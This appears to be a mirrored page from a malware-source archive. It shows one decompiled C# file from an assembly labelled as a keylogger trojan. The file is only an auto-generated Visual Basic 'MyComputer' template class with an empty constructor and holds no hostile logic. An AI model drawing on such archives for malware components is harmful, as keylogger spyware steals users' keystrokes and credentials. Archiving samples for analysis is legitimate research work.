mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-22 10:49:23 +00:00
f2ac1ece55
add
25 lines
767 B
C#
25 lines
767 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: sTUB3.My.MyComputer
|
|
// Assembly: sTUB3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: A48CA51E-DD48-4A82-AD76-B7119655ACE2
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\HEUR-Trojan-Spy.MSIL.KeyLogger.cxy-16ef54e05f60ffe8b7333259df765d3431fb83555b6fc9170539714b4f83cb9c.exe
|
|
|
|
using Microsoft.VisualBasic.Devices;
|
|
using System.CodeDom.Compiler;
|
|
using System.ComponentModel;
|
|
using System.Diagnostics;
|
|
|
|
namespace sTUB3.My
|
|
{
|
|
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
internal class MyComputer : Computer
|
|
{
|
|
[DebuggerHidden]
|
|
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
public MyComputer()
|
|
{
|
|
}
|
|
}
|
|
}
|